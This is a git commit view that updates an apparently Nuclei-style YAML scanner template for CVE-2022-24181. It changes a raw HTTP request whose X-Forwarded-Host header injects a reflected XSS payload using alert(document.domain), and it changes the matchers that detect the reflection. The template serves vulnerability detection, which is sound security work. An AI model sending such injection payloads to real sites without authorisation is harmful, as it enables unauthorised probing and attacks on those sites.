Update CVE-2022-24181.yaml

patch-1
Prince Chaddha 2022-07-10 01:52:12 +05:30 committed by GitHub
parent c934197fcd
commit 1c4436d633
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 3 deletions

View File

@ -21,16 +21,16 @@ info:
requests:
- raw:
- |
GET /iupjournals/index.php HTTP/2
GET /iupjournals/index.php/esj HTTP/2
Host: {{Hostname}}
X-Forwarded-Host: foo"></script><script>alert(document.domain)</script><x=".com
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- '<script>alert(document.domain)</script><x=".com/iupjournals'
- type: word
part: header